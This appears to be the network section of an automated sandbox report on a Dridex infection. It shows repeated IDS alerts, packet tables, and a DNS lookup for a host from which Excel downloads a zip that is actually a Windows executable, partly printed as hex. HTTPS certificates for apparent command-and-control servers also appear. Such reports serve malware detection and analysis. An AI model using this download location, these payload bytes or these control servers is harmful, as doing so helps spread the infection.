                                                                                                                                01/11/21-20:48:13.352687TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492215.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:14.395801TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922477.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:14.919524TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922580.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:15.430843TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492275.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:15.430843TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492275.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:17.015165TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:17.530500TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:19.036961TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492315.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:19.036961TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492315.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:20.087624TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:20.629875TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:21.160457TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492355.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:21.160457TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492355.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:22.192376TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:22.717566TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:23.234296TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492395.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:23.234296TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492395.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:24.263045TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:24.796829TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:25.335003TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492435.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:25.335003TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492435.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:26.370615TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:26.884548TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:27.420708TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492475.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:27.420708TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492475.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:28.459826TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:29.000097TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:29.527147TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492515.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:29.527147TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492515.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:30.625606TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:31.146087TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:31.662791TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492555.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:31.662791TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492555.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:32.715358TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:33.228364TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:33.749819TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492595.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:33.749819TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492595.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:34.991721TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:35.880142TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:36.405856TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492635.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:36.405856TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492635.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:37.467885TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:37.994826TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:38.519760TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492675.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:38.519760TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492675.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:39.556782TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:40.066731TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:40.577625TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492715.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:40.577625TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492715.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:41.984070TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:42.499308TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:43.018257TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492755.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:43.018257TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492755.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:44.053274TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:44.579320TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:45.104603TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492795.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:45.104603TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492795.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:46.141495TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:46.666241TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:47.182448TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492835.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:47.182448TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492835.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:48.231998TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:48.761039TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:49.562937TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492875.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:49.562937TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492875.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:50.588831TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:51.108516TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:51.737151TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492915.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:51.737151TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492915.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:53.152587TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:53.702863TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:54.232464TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492955.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:54.232464TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492955.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:55.305953TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:55.823725TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:56.353899TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492995.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:56.353899TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492995.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:57.392349TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:57.929658TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:58.470993TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493035.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:58.470993TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493035.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:59.528377TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:00.055573TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:00.575455TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493075.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:00.575455TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493075.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:01.635516TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:02.151598TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:02.678194TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493115.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:02.678194TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493115.100.228.233192.168.2.22

Network Port Distribution

TCP Packets

                                                                                                                                Jan 11, 2021 20:47:36.660681963 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660702944 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660712004 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660741091 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660741091 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660782099 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660820007 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660823107 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660845995 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660876036 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.661947966 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.661986113 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662023067 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662054062 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662060022 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662086964 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662096024 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662113905 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662134886 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662144899 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662170887 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662173033 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662220001 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662223101 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662262917 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662272930 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662319899 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662945986 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.860807896 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.860872030 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.860902071 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.860932112 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.860970020 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.861008883 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.861046076 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.861093998 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.861097097 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.861114025 CET4916580192.168.2.22198.54.125.162

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2021 20:47:35.802675962 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 20:47:35.867634058 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 20:47:41.924619913 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 20:47:41.985228062 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 20:47:41.997029066 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 20:47:42.045030117 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 20:48:13.756444931 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 20:48:13.813184977 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 20:48:13.831610918 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 20:48:13.888201952 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 20:48:15.015911102 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 20:48:15.063836098 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 20:48:15.076841116 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 20:48:15.124778032 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 11, 2021 20:47:35.802675962 CET | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | wexfashion.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 11, 2021 20:47:35.867634058 CET | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | wexfashion.com | (none) | 198.54.125.162 | A (IP address) | IN (0x0001)
Jan 11, 2021 20:48:15.063836098 CET | 8.8.8.8 | 192.168.2.22 | 0xd799 | No error (0) | cdn.digicertcdn.com | (none) | 104.18.11.39 | A (IP address) | IN (0x0001)
Jan 11, 2021 20:48:15.063836098 CET | 8.8.8.8 | 192.168.2.22 | 0xd799 | No error (0) | cdn.digicertcdn.com | (none) | 104.18.10.39 | A (IP address) | IN (0x0001)
Jan 11, 2021 20:48:15.124778032 CET | 8.8.8.8 | 192.168.2.22 | 0x689d | No error (0) | cdn.digicertcdn.com | (none) | 104.18.11.39 | A (IP address) | IN (0x0001)
Jan 11, 2021 20:48:15.124778032 CET | 8.8.8.8 | 192.168.2.22 | 0x689d | No error (0) | cdn.digicertcdn.com | (none) | 104.18.10.39 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• wexfashion.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 198.54.125.162 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jan 11, 2021 20:47:36.074425936 CET | 0 | OUT | GET /k04qkvqu.zip HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: wexfashion.com
Connection: Keep-Alive
Jan 11, 2021 20:47:36.272814035 CET | 2 | IN | HTTP/1.1 200 OK
date: Mon, 11 Jan 2021 19:47:36 GMT
server: Apache
last-modified: Mon, 11 Jan 2021 08:08:04 GMT
accept-ranges: bytes
content-length: 318976
content-type: application/zip
                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 c1 97 fc 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 7a 04 00 00 60 00 00 00 00 00 00 d0 26 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 82 00 00 8c 00 00 00 00 00 05 00 7c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 86 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 24 00 00 00 10 00 00 00 26 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 40 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 33 00 d8 03 00 00 00 50 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 60 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 46 00 00 00 00 70 00 00 00 02 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 1b 00 00 00 80 00 00 00 1c 00 00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 
74 34 00 00 cc 52 04 00 00 a0 00 00 00 54 04 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 7c 2e 00 00 00 00 05 00 00 30 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 09 00 00 00 30 05 00 00 0a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 56 8b 45 0c 89 45 fc 8b 0d 28 9b 00 10 89 4d 08 68 5c 11 00 00 6a 00 ff 15 74 80 00 10 8b 55 fc 8d b4 02 66 a1 06 00 68 5c 11 00 00 6a 00 ff 15 74 80 00 10 03 f0 8b 45 08 03 30 8b 4d 08 89 31 8b 55 08 8b 02 2d 66 a1 06 00 8b 4d 08 89 01 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 51 a1 d8 9a 00 10 89 45 fc 8b 65 fc 58 8b e8 a1 f4 9a 00 10
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_!2z`&@@|.0P.text$& `.rdata@*@@.rdata3P,@@.2`0@@.rdata2Fp2@@.data`4@.text4RTP @.rsrc|.0@@.relocP0@BUQVEE(Mh\jtUfh\jtE0M1U-fM^]UQEeX


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jan 11, 2021 20:47:41.098542929 CET | 77.220.64.37 | 443 | 192.168.2.22 | 49166 | CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW | CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW | Sun Nov 22 23:47:21 CET 2020 | Mon May 24 00:47:21 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 20:47:45.534218073 CET | 77.220.64.37 | 443 | 192.168.2.22 | 49171 | CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW | CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW | Sun Nov 22 23:47:21 CET 2020 | Mon May 24 00:47:21 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 20:47:47.673510075 CET | 77.220.64.37 | 443 | 192.168.2.22 | 49175 | CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW | CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW | Sun Nov 22 23:47:21 CET 2020 | Mon May 24 00:47:21 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
